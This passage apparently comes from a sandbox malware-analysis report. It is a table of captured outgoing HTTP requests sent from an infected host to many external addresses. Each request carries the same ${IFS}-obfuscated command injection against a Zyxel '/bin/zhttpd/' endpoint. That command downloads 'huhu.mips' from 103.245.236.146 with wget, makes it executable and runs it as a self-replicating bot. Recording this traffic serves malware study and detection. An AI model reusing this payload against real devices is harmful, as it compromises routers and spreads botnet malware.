                                                  Jan 19, 2024 18:24:16.472167015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9409192.168.2.1360400165.176.123.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472203970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9410192.168.2.133960888.128.176.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472246885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9411192.168.2.1349108197.106.159.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472287893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9412192.168.2.134561413.150.251.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472326994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9413192.168.2.133403064.128.107.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472373009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9414192.168.2.1342140144.68.207.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472408056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9415192.168.2.134874663.133.220.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472440004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9416192.168.2.133422464.25.239.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472487926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9417192.168.2.135720876.109.243.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472511053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9418192.168.2.1340082151.193.217.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472554922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9419192.168.2.135283261.189.8.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472604036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9420192.168.2.1359726125.184.238.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472649097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9421192.168.2.1350900154.37.7.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472698927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9422192.168.2.134854425.172.105.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472721100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9423192.168.2.1356994135.121.54.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472764015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9424192.168.2.133280085.45.144.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472817898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9425192.168.2.1352100132.161.131.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472879887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9426192.168.2.134413661.247.181.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472901106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9427192.168.2.1335720120.27.8.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472944975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9428192.168.2.135345089.69.96.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472990036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9429192.168.2.1341796145.123.217.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473025084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9430192.168.2.136039842.236.95.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473109007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9431192.168.2.133638687.2.160.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473131895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9432192.168.2.13591905.104.121.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473169088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9433192.168.2.1358542111.123.158.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473222971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9434192.168.2.13412449.121.253.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473251104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9435192.168.2.1337446153.163.203.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473301888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9436192.168.2.134916694.218.30.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473336935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9437192.168.2.134848699.159.142.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473392963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9438192.168.2.1356212143.76.180.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473427057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9439192.168.2.1358046196.255.214.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473469019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9440192.168.2.1358148183.157.123.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473530054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9441192.168.2.1338482140.243.194.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473560095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9442192.168.2.133533836.146.88.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473609924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9443192.168.2.134234051.63.70.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473627090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9444192.168.2.1337146118.204.114.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473676920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9445192.168.2.1350056159.180.162.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473728895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9446192.168.2.135392054.33.204.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473767042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9447192.168.2.1334220199.153.215.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473805904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9448192.168.2.13425202.141.85.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473844051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9449192.168.2.1335076145.232.13.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473892927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9450192.168.2.13450281.166.134.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473920107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9451192.168.2.1341596146.35.67.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.473969936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9452192.168.2.1340558128.60.38.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474016905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9453192.168.2.134595473.158.241.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474064112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9454192.168.2.135774875.62.17.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474096060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9455192.168.2.1343030103.14.188.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474117994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9456192.168.2.1333424209.104.96.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474165916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9457192.168.2.1333448154.76.217.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474216938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9458192.168.2.1347050160.77.207.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474246979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9459192.168.2.135274034.168.204.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474296093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9460192.168.2.1334104211.14.105.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474322081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9461192.168.2.1334336120.252.100.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474358082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9462192.168.2.135109280.200.127.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474400997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9463192.168.2.1348012181.0.130.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474436045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9464192.168.2.1351750122.5.220.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474469900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9465192.168.2.133687225.175.185.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474519014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9466192.168.2.135741461.55.178.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474570036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9467192.168.2.134306267.69.13.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474615097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9468192.168.2.1356804182.104.194.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474647999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9469192.168.2.133354467.140.150.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474693060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9470192.168.2.1344152189.123.213.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.474728107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9471192.168.2.13420401.233.103.149443
                                                  TimestampBytes transferredDirectionData
